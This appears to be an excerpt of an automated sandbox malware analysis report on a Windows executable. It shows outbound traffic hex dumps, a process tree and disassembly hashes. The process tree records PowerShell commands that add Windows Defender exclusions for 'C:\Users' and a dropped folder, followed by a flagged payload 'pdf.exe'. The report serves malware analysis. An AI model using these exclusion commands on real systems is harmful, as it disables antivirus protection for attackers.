2024-10-29 21:04:43 UTC	15331	OUT	Data Raw: 3c 87 4f 61 3c 07 9c 4f 55 5a b6 ad c6 e0 7a 9f 9a be e5 a9 a0 44 3b b3 7f d3 41 8d 1f 4b 70 ae 91 01 ae a3 b0 e3 08 9b 6d 32 20 c9 0a f9 9b 63 89 53 13 78 8c 75 a1 aa 05 80 41 f3 35 39 e8 e2 2b 28 2b 74 e5 58 56 ab 04 d1 03 c1 a3 09 b6 a5 9a 39 c7 b4 c4 c2 15 a4 cf 5d d9 db d2 e2 05 d3 73 b2 4b e1 05 09 f8 d6 66 c6 9f da 84 d6 64 12 27 97 1f 1b a1 a5 07 99 9c e3 22 09 a1 43 4e 8b e5 5c 67 74 e9 ba 88 85 5e 15 da df 5f 7e bd 4e 99 26 d1 0f 15 0b 26 e1 95 61 5d 3c a4 be f3 d7 39 95 c5 f7 e2 2a 27 8f e2 f7 7f ae c0 38 51 68 86 ed 0a 96 d0 e2 b1 ab 2c 0e 19 ae ee 19 a4 99 b9 30 55 8f e7 78 93 c3 aa 09 4d 7f 6c a8 9f 3f dc de 55 76 a0 c0 76 10 86 6d cb 70 57 99 40 be bc d4 e6 c5 68 eb c8 ba 4b 4c d9 15 be 87 e8 1c e2 6d 18 e4 3f fa da 4c 53 96 2d d2 25 d7 ab Data Ascii: <Oa<OUZzD;AKpm2 cSxuA59+(+tXV9]sKfd'"CN\gt^_~N&&a]<9*'8Qh,0UxMl?UvvmpW@hKLm?LS-%
2024-10-29 21:04:43 UTC	15331	OUT	Data Raw: db d9 36 1b 2f af 33 f3 af 70 3c b6 9c 73 34 c5 3f 04 76 92 76 d6 03 bf a1 ed 63 68 6e a1 5d 80 9e 04 d9 5c 84 7d 47 d1 cb 79 ce 50 31 df 47 40 ef d9 79 fb 14 b1 52 f4 00 ed 7a aa a4 ac 3b 4d 6d 91 b2 f0 2a c5 83 35 ee 0f 47 08 e6 91 6f 8a cb db b0 cf 44 63 ac c5 30 ad d7 73 a8 ba 23 27 a3 58 2e 30 72 5d 5c 86 23 44 b9 7c 97 85 86 46 23 00 13 81 98 b9 11 ca ca 43 83 cc 7a 49 70 90 75 b2 ba ea 8f 95 8d 4e 0a 0b 2d df 05 72 1d 3e bc bf fa 92 c0 3a 0e 27 df d7 a0 08 c0 78 b6 c8 93 13 0c bb 03 c8 d5 32 88 1e 03 25 42 cc 8b 22 bc 85 71 61 43 9b a0 5a 7d 10 19 76 7d d1 c9 77 e3 52 a2 d3 a1 22 18 5d 9a fb 12 cd 7d 95 bc 76 2a 21 8c 79 e1 68 b7 31 93 b8 bb 9d 4e b2 13 ac 41 2f 74 9c 4f e3 9f f0 81 ed 62 7d 7e 9f 20 0b 60 8d 42 97 e5 09 29 77 54 60 5f 20 82 42 ba Data Ascii: 6/3p<s4?vvchn]\}GyP1G@yRz;Mm5GoDc0s#'X.0r]\#D\|F#CzIpuN-r>:'x2%B"qaCZ}v}wR"]}v!yh1NA/tOb}~ `B)wT`_ B
2024-10-29 21:04:43 UTC	15331	OUT	Data Raw: e4 64 38 df 2e e1 de 57 4e be 70 db 03 88 98 b3 94 a7 48 f3 48 1d fa 91 f5 b6 83 25 90 50 7f a1 37 47 05 a1 72 94 7b c7 ea 8c cd 13 06 f9 c0 4e fa b4 45 db 6a a5 2a ea dd 43 56 98 c0 42 84 e0 92 50 da ca 71 e2 ae 95 4b a8 74 47 89 71 3e 9e 59 a9 c9 e9 e6 3c 38 46 ae fc 3a 8c e5 c3 35 3e a1 98 d2 f8 81 6f 6b 5a 2b ec 85 00 6e c1 33 7f 77 2a fa 2d 73 0a 51 c7 26 31 ab d5 f3 d5 fc e7 6f 66 44 b9 6f 14 9d 20 1c 58 c7 a7 84 41 68 be c9 44 7e 02 f5 eb c3 26 25 c4 71 d1 24 0a 16 17 4f e7 49 3b 10 02 18 18 cc cf 03 d1 cb 00 8d f5 f4 80 8d 1f 1b a0 4f ed fa 15 f8 49 4b 95 19 41 bf 48 0f ed ae 35 c6 cd a4 8c d3 f6 e9 6e a2 67 7d ea 9d a8 1b 5f 0c 82 5a 0c a6 d0 1d 21 36 fb 8f d6 e9 bc 4c 28 78 dd 51 6b ee 0c 17 07 e9 51 b7 7e 08 87 7c 78 3d 6c 3d 2c cf e0 d9 a2 f7 Data Ascii: d8.WNpHH%P7Gr{NEjCVBPqKtGq>Y<8F:5>okZ+n3w-sQ&1ofDo XAhD~&%q$OI;OIKAH5ng}_Z!6L(xQkQ~\|x=l=,
2024-10-29 21:04:43 UTC	15331	OUT	Data Raw: 62 52 6f 0c d9 7f db 27 23 cb 0a ca 6a be c9 0d a1 ea b6 4f 62 01 f1 ef 8b bd 70 c4 0b c5 22 81 e4 bd 5d 1a 55 6c be 6d 45 b0 6b 51 11 1d c3 79 12 c8 8f 72 32 53 9c b4 37 66 26 29 d1 d0 1c c2 7f 0c e0 f9 f7 bb 50 82 5a 54 f9 05 87 b3 85 0d 7e ea 4e dd 94 d8 8c f5 df 83 b7 30 c6 7f a4 ca 73 51 b4 6e b2 7d 9b 33 c5 c8 31 8d 58 28 52 0c fc 4e d3 c8 20 5f 59 a2 ff 1e 49 3a 3a 91 59 c5 92 98 e2 9a 74 1d eb ed 40 5f e6 46 d3 71 08 ac f9 11 7c 07 f7 cc f5 f8 cb f3 46 30 5a 43 13 e0 c6 f1 2e 62 34 b1 58 4c 57 b2 97 b1 a3 30 ec fb df 16 8f d9 68 12 ff 11 79 44 91 99 cd f0 21 8c a0 fc cc aa a2 08 1f 4d 83 8c 8c d2 e3 bc 11 d1 41 2a 22 fa c6 e6 79 5b ed 6e b6 4c 4c d8 74 4f 0e 7a 5e 64 0b 12 50 19 1b bd 57 40 28 78 73 1b db 69 df 42 ec 12 97 bb e5 65 c8 45 a9 78 16 Data Ascii: bRo'#jObp"]UlmEkQyr2S7f&)PZT~N0sQn}31X(RN _YI::Yt@_Fq\|F0ZC.b4XLW0hyD!MA*"y[nLLtOz^dPW@(xsiBeEx
2024-10-29 21:04:49 UTC	1027	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 21:04:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=pqpq3f1bs2rjr56esstuncpmou; expires=Sat, 22 Feb 2025 14:51:23 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fGiuQEM%2FKMLyI2ipB1F3xEukimBDTak5ZrGhUKGk6%2FSl7IPt1p96rswyOWbX0HPB%2BeY%2BfW%2BY0EhOE%2FNTcIgpfAFMSCUvzop5%2BqvIpY%2F5jz%2FlCFFBXBmaWtb%2FqFd%2FgFTo"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da61e9fefed6c3c-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1231&sent=210&recv=605&lost=0&retrans=0&sent_bytes=2830&recv_bytes=572688&delivery_rate=2458404&cwnd=250&unsent_bytes=0&cid=845392a0536e38b9&ts=6401&x=0"

Target ID:	0
Start time:	17:03:58
Start date:	29/10/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x60000
File size:	21'504 bytes
MD5 hash:	3BA35E9D091539EC658813E3D15E4B89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	17:03:58
Start date:	29/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	17:04:02
Start date:	29/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Lipras'; Add-MpPreference -ExclusionPath 'C:\Users'"
Imagebase:	0x660000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	17:04:02
Start date:	29/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	17:04:02
Start date:	29/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Lipras
Imagebase:	0x660000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	17:04:04
Start date:	29/10/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	17:04:21
Start date:	29/10/2024
Path:	C:\Lipras\pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Lipras\pdf.exe"
Imagebase:	0x30000
File size:	1'290'240 bytes
MD5 hash:	21EB0B29554B832D677CEA9E8A59B999
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 59%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Function 009B09B8 Relevance: .4, Instructions: 403COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4141377142.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c489179e2d761d19b79d7fbb7ba0e14005dded5b56caa3083a6b6f1fe63b220
Instruction ID: f5cb17ed40bb0482dafb52be7c707cbef57e67f87a3a52eda53940364edb2a3b
Opcode Fuzzy Hash: 1c489179e2d761d19b79d7fbb7ba0e14005dded5b56caa3083a6b6f1fe63b220
Instruction Fuzzy Hash: FAF1F674E01208CFDB04DFA5D598AAEBBF5BF89314F10A569D409AB3A5CB74AC85CF04

Function 009B11F0 Relevance: 1.3, Strings: 1, Instructions: 48COMMON

Download Yara Rule

Strings

"f, xrefs: 009B11F0

Memory Dump Source

Source File: 00000000.00000002.4141377142.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_file.jbxd

Similarity

API ID:
String ID: "f
API String ID: 0-1119522994
Opcode ID: 1235d1c088bebb28f90b9d0868dffa34a42b2c8914b4e6850c6f7cf820724645
Instruction ID: d2320f57db2e306c8e0eaa226a07e66d018377be329aafe7a81ee5d20614f2df
Opcode Fuzzy Hash: 1235d1c088bebb28f90b9d0868dffa34a42b2c8914b4e6850c6f7cf820724645
Instruction Fuzzy Hash: C5015E70C462099FDB45EFB5D5687EDBFB4AB46300F50A5AAC815E32A4E7744B44CB04

Function 009B259D Relevance: .8, Instructions: 812COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4141377142.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64de74a9a3aa9ebc72f0a954348b417ab1d5baa06ed4b726f3268e878ca6de66
Instruction ID: 0ef2a53457f1f4cdc3cb42a305685543b9d846cc7946b2c77ed5cd4efd62fa5d
Opcode Fuzzy Hash: 64de74a9a3aa9ebc72f0a954348b417ab1d5baa06ed4b726f3268e878ca6de66
Instruction Fuzzy Hash: CA11813190C2888FCF468FA8D9246ED7FB1EF8A310F0550ABD880AB292D6754C09CB65

Function 009B1280 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4141377142.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a457bef8496757c6fb722d570ba47ea612aac5c846bc1835863dab7ccf14644
Instruction ID: cc6b2dfb3409f680c76b8223d9714e4ee4001d04687d70637d8770670f160312
Opcode Fuzzy Hash: 1a457bef8496757c6fb722d570ba47ea612aac5c846bc1835863dab7ccf14644
Instruction Fuzzy Hash: 2A413970D4230ACFCB19DFB5C550AAEBBB2AF86314F6098ADC405A7390DB359A81CF54

Function 009B1030 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4141377142.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b995944a044fe7bdc7ad4d1f4a1e2ac799a3b2b58762ac439f5975b8ca68e0c3
Instruction ID: 9eee24735e4fb8cca0e361d84e095bb17c7aa01896a39f221de7859dc180b1ae
Opcode Fuzzy Hash: b995944a044fe7bdc7ad4d1f4a1e2ac799a3b2b58762ac439f5975b8ca68e0c3
Instruction Fuzzy Hash: BF3199B5D05258DFCB10CFAAE984ADEFBF4AB49320F24906AE814B7310D375A945CF64

Function 0065D428 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4139229994.000000000065D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0065D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65d000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f26978f77ab538643d02a4c5af91f3187f88b8bf897c05d371c76115e62623c8
Instruction ID: d4866c8b111af4af815df3d947b6850f22a9d7ec67fecb7dce5d5e20e5540a89
Opcode Fuzzy Hash: f26978f77ab538643d02a4c5af91f3187f88b8bf897c05d371c76115e62623c8
Instruction Fuzzy Hash: 88213771500240DFDB25DF14D9C0B2ABFA6FB94315F24C569ED090B396C336E85AC7A2

Function 009B13A7 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4141377142.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a745b70560ded309d2742f8d14b1cc018d04929fca20da1f40daf14f1f643cdc
Instruction ID: b3aac9140174cfd251178072fedd0152ef6647540fa568a293d441814dbe0ec0
Opcode Fuzzy Hash: a745b70560ded309d2742f8d14b1cc018d04929fca20da1f40daf14f1f643cdc
Instruction Fuzzy Hash: 71216D30D15208DFCB18DFA5DA65AEEBBB2BF89310F64652AD401B72A0CB744941CF64

Function 009B08AC Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4141377142.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5c3ffc25b886c1f6efe4437b220080aa1fe569d1d243559223c5f476b979cd1
Instruction ID: 38dae2a76607f3ac3ccc1b24a9d72d7f2a5fbf5d21bc0be95df408c40fb11913
Opcode Fuzzy Hash: a5c3ffc25b886c1f6efe4437b220080aa1fe569d1d243559223c5f476b979cd1
Instruction Fuzzy Hash: 0F210970D0015A9FCB01DFA8D5509DDBBB6EF49310F0582AAE455B7365DB30AE86CF90

Function 0065D423 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4139229994.000000000065D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0065D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65d000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 7d56ca2101a1ef7b5a8fdcbfdfbb454fdf6bd352f765449f3cb1273f147812b9
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 6211AF76504280DFDB16CF14D5C4B56BFA2FB94314F24C5A9DC090B656C336D85ACBA2

Function 009B0F90 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4141377142.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3a13da3d6015a524d64ea473d6a26ddc0a0571abb87a31f0aa3659352e19fb3
Instruction ID: 4401dfddf81907eddcc3fd4f08a7ecc61f415ddb15792ed26af3b5426d595ba0
Opcode Fuzzy Hash: e3a13da3d6015a524d64ea473d6a26ddc0a0571abb87a31f0aa3659352e19fb3
Instruction Fuzzy Hash: 40114270D062499FCB44DFB985902AEBFF1AF8A300F2094AAD404A7241EB744B40DF90

Function 009B150D Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4141377142.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f0552a7e2875931b66745181fa20c6d6962bf1e59023a88ea95c4e28e52ed18
Instruction ID: 791c0704f3faf2920e7aad7775870cae6c5630104060a35eca30d1714be29052
Opcode Fuzzy Hash: 1f0552a7e2875931b66745181fa20c6d6962bf1e59023a88ea95c4e28e52ed18
Instruction Fuzzy Hash: 41F0282050C389CBCB22CB5455683FE7FB2DB82335F5810D6C541A7166C6A08448C3D0

Function 009B110F Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4141377142.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 468a376f0fdd1bb2bc4194edc66b486e526a07d733a49108c27de56993c3a96a
Instruction ID: eef88753dd0fb19c1abc74b4c29fdfd39ba69cf8f0d633b6013d6084bf025097
Opcode Fuzzy Hash: 468a376f0fdd1bb2bc4194edc66b486e526a07d733a49108c27de56993c3a96a
Instruction Fuzzy Hash: 7E014470E082499FCB40DFB8D9946ADBFB1FF4A301F2089AAD455A73A1DB344A04DB81

Function 009B0848 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4141377142.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80072f4107299cd537a5608eeacfd3f7bc20e48abef4702d8f31a02dff38032a
Instruction ID: 498da6b60e889375e2aa4383830d28e454762c16da2245ac05b4ed51bb806404
Opcode Fuzzy Hash: 80072f4107299cd537a5608eeacfd3f7bc20e48abef4702d8f31a02dff38032a
Instruction Fuzzy Hash: EAF0AF70D01209DFCB44EFB8D9406AEBBB5FB45301F1046AAD415A7260EBB19A44CB80

Function 009B11A0 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4141377142.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 210f6b033a4d8d8d2890f9cb41313fdea4fc1a76857dba297d19a60c8d594b12
Instruction ID: 5a97efda51a6761b45dbfac07dc1dc9c4e572eb719621262fbcffefebfd7df8e
Opcode Fuzzy Hash: 210f6b033a4d8d8d2890f9cb41313fdea4fc1a76857dba297d19a60c8d594b12
Instruction Fuzzy Hash: AFF0D470D11209EFCB80DFE8C544A9EBBF4BB48310F1095AAD818A3350E7B49A44CF81

Analysis Process: powershell.exePID: 7424, Parent PID: 7300COMMON

Execution Graph

Execution Coverage:	6.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 04C6B4B8 Relevance: 5.3, Strings: 4, Instructions: 258
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

;Um^, xrefs: 04C6B504
Xn{&, xrefs: 04C6B760, 04C6B765
Tm^, xrefs: 04C6B649
+Um^, xrefs: 04C6B551

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID: Xn{&$+Um^$;Um^$Tm^
API String ID: 0-3111370926
Opcode ID: 26b60a0a775b17269fbe3fb2f74847a57d376064278764b7952b77c6baca1190
Instruction ID: 4d7d5970a78e27754cfd615a5ee7120ea06a2b35710c51c12050dfe996e50a59
Opcode Fuzzy Hash: 26b60a0a775b17269fbe3fb2f74847a57d376064278764b7952b77c6baca1190
Instruction Fuzzy Hash: FE91A575F006185BDB1AEFB484446AEBBA3DF84604B00C92DD15BAF344DF38AD068BD6

Function 04C6B4C8 Relevance: 5.3, Strings: 4, Instructions: 252
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

;Um^, xrefs: 04C6B504
Xn{&, xrefs: 04C6B760, 04C6B765
Tm^, xrefs: 04C6B649
+Um^, xrefs: 04C6B551

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID: Xn{&$+Um^$;Um^$Tm^
API String ID: 0-3111370926
Opcode ID: 39a42b9bbc9443c603cc252aa166fab675dbf3b2b799bb096b13dc45949cbff6
Instruction ID: 135353d0096dc219fd6ebbd16311b476ca30733447cc4b938140de7a497f4bd4
Opcode Fuzzy Hash: 39a42b9bbc9443c603cc252aa166fab675dbf3b2b799bb096b13dc45949cbff6
Instruction Fuzzy Hash: AA919475F006185BDB19DFB484446AEB7E3DF84604B00C92CD15AAB344DF78AD068BD6

Function 079E3CE8 Relevance: 5.4, Strings: 4, Instructions: 440
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 079E418A
4'^q, xrefs: 079E4026
4'^q, xrefs: 079E4030
4'^q, xrefs: 079E4180

Memory Dump Source

Source File: 00000002.00000002.1763697419.00000000079E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_79e0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q
API String ID: 0-1420252700
Opcode ID: 58f1da313289693421f592fbc6ca10f21a44294ff2453475a34586dbc389e43d
Instruction ID: 1010817c164f2e45666f6663f71e2fde0dcc0173adfad9b54d1e008df3c20446
Opcode Fuzzy Hash: 58f1da313289693421f592fbc6ca10f21a44294ff2453475a34586dbc389e43d
Instruction Fuzzy Hash: B0E12DB1B002458FDB268B68C50166BBBFEAFD5314F1588BAE801DB361DB31DD85C792

Function 079E24DB Relevance: 5.2, Strings: 4, Instructions: 239
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 079E2619
4'^q, xrefs: 079E260D
|,Wk, xrefs: 079E25DB
piUk, xrefs: 079E2582

Memory Dump Source

Source File: 00000002.00000002.1763697419.00000000079E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_79e0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$piUk$|,Wk
API String ID: 0-902921423
Opcode ID: b97d6fb0cb2635a41e2cc6e4acfb956eb62f83bc56054275cc4525cad32ef1b8
Instruction ID: 2221a3449151e637bbc14ed9a760312c37a589bf6837bb5df42ff8a7597de64c
Opcode Fuzzy Hash: b97d6fb0cb2635a41e2cc6e4acfb956eb62f83bc56054275cc4525cad32ef1b8
Instruction Fuzzy Hash: 2E8115B1A00A06DFDB26CF68C5406AA77FDBF89328F14857BD405CB251DB75D884CBA1

Function 08C66839 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadToken.KERNELBASE(EFC00870), ref: 08C668A2

Strings

Xn{&, xrefs: 08C6685A

Memory Dump Source

Source File: 00000002.00000002.1767634382.0000000008C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c60000_powershell.jbxd

Similarity

API ID: ThreadToken
String ID: Xn{&
API String ID: 3254676861-1936866235
Opcode ID: f921252017661530bdedbf30976522a5cf32fd0b5a04c6f4929b00cb00088d41
Instruction ID: d18ea46004a643181ae29aa731a82bb5126370b3fd7a8acca7fb086b1587614f
Opcode Fuzzy Hash: f921252017661530bdedbf30976522a5cf32fd0b5a04c6f4929b00cb00088d41
Instruction Fuzzy Hash: D61113B59002588FCB10DFAAD984ADEFBF4AB88324F248429D459A7210D774A944CFA1

Function 08C66840 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadToken.KERNELBASE(EFC00870), ref: 08C668A2

Strings

Xn{&, xrefs: 08C6685A

Memory Dump Source

Source File: 00000002.00000002.1767634382.0000000008C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c60000_powershell.jbxd

Similarity

API ID: ThreadToken
String ID: Xn{&
API String ID: 3254676861-1936866235
Opcode ID: 77b1edf3addb06eb5b1d53c8158f93525ace598c897dc687fb320e91e791dfab
Instruction ID: 84d9768d3a98bc0f4cee099d275aa934d8a938426e10154ce7bd43281347ef8f
Opcode Fuzzy Hash: 77b1edf3addb06eb5b1d53c8158f93525ace598c897dc687fb320e91e791dfab
Instruction Fuzzy Hash: 5F1125B19002488FCB10DFAAC984B9EFBF8EB88320F248429D458A7210D774A944CFA1

Function 04C6AFD0 Relevance: 2.6, Strings: 2, Instructions: 81
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xn{&, xrefs: 04C6B03A
(&^q, xrefs: 04C6AFF2

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID: (&^q$Xn{&
API String ID: 0-903511593
Opcode ID: 3d9d2dbdb155d07726397e5b030cb084fdb35784b2ae00d31e055483d7ab5f00
Instruction ID: 53999df2eb9cd59445285c12fb90a47be35ca0c6ef8e97a054814ad6097ecc96
Opcode Fuzzy Hash: 3d9d2dbdb155d07726397e5b030cb084fdb35784b2ae00d31e055483d7ab5f00
Instruction Fuzzy Hash: F821E071A002688FCB14DFAED84469EBFF6EB89320F14846AD419E7300CA35A904CBA5

Function 04C68B6B Relevance: 1.4, Strings: 1, Instructions: 188
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xn{&, xrefs: 04C6BA72

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

